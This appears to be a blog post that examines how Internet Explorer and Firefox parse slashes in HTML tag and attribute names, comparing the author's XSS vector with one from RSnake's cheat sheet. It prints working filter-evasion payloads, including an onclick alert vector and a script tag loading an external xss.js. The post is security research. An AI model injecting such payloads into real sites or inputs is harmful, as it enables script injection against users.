A while ago, I submitted the following XSS vector to the maintainer of the XSS cheat sheet (RSnake):

<a href="#"www/onclick=alert(/xss/)>click me! (works in ie)</a>

They didn't think it worthy of an addition because, as they said, it "is really very similar to the [Non-alpha-non-digit XSS] vector I already have listed on the page".

How could this be, I thought? Mine works only in Internet Explorer while there's works in both Internet Explorer and FireFox. So lets examine in the issue and judge, for ourselves, whether or not they're really the same. The Non-alpha-non-digit XSS vector is as follows:

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Change this around a bit and we get...

<img/xss src="http://www.google.com/intl/en/images/logo.gif" alt="google">

View this in FireFox, highlight the resultant image, and view the selection source (eg. the DOM source). You'll see the following:

<img src="http://www.google.com/intl/en/images/logo.gif" alt="google">

In Internet Explorer, there is no way to view the DOM source, but we can assume, for reasons that will be elaborated upon later, that if there was such a feature, we'd see the following:

<img xss="" src="http://www.google.com/intl/en/images/logo.gif" alt="google">

To confirm this, view the following, in Internet Explorer:

<img/xss src="http://www.google.com/intl/en/images/logo.gif" alt="google" onload="alert(this.xss)">

Note how, in Internet Explorer, a blank window pops up.

Now view this:

<img src="http://www.google.com/intl/en/images/logo.gif" alt="google" onload="alert(this.xss)">

In Internet Explorer (and FireFox), a window containing the word "undefined" pops up.

So, basically, Internet Explorer is assuming xss to be an attribute of img/xss (or rather, just img).

Now let's assign that attribute some values:

<img/src="http://www.google.com/intl/en/images/logo.gif" alt="google">

In Internet Explorer, this shows the image. In FireFox it doesn't. The DOM source, in FireFox, is as follows:

<img /src="http://www.google.com/intl/en/images/logo.gif" alt="google">

This suggests that either Internet Explorer ignores select characters in attribute names when parsing or that those characters are parsed away before the HTML is actually rendered.

Let's try something else, now:

<img/alt="google" src="http://www.google.com/intl/en/images/logo.gif" onload="alert(this.getAttribute('/alt'))">

In FireFox, this outputs google. In Internet Explorer, it outputs null.

<img/alt="google" src="http://www.google.com/intl/en/images/logo.gif" onload="alert(this.getAttribute('alt'))">

In Internet Explorer, this outputs google. In FireFox, it outputs null.

This confirms that the latter is indeed what is happening - that Internet Explorer parses select characters away before the HTML is actually rendered. Or that, in this context, / is seen by Internet Explorer as simply a space.

So what about img/xss in FireFox, when xss isn't set to anything? Since the /xss attribute would exist if it were set to something, why doesn't the /xss attribute exist when it isn't? I honestly don't know. Blank attributes aren't normally a problem, as viewing the DOM source of the following, in FireFox, demonstrates:

<img src="http://www.google.com/intl/en/images/logo.gif" alt>

So, anyway, upon examining the issue, I agree with RSnake - that the vectors are indeed sufficiently similar so as to not warrant mention. The reason the Non-alpha-non-digit XSS vector works in both browsers whereas mine only works in one is that the Non-alpha-non-digit XSS vector demonstrated demonstrates a different XSS vector in Internet Explorer than it does in FireFox. The FireFox vector is also less portable than the Internet Explorer vector since it only works for element names (or "HTML keyword"s) whereas the Internet Explorer vector works anywhere.